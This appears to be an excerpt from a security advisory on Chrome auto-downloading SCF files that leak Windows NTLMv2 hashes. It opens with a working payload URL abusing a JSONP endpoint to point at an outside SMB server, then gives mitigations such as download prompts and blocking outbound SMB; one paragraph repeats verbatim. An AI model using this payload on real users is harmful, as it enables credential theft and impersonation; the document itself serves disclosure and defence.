http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix= %0A[Shell]%0AIconFile=\\170.170.170.170\test%0Alol=%0B&format=jsonp Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes. Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes. Recommendations In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files. As SCF files still pose a threat the measures that need to be taken depend on affected users network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing and Extended Protection. With the first two the goal is to prevent SMB traffic from leaving the corporate environment by blocking ports that can be used to initiate a connection with a potentially malicious Internet-based SMB server. When possible, SMB traffic should always be restricted to private networks. Conclusion Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources. We hope that the Google Chrome browser will be updated to address this flaw in the near future. Article source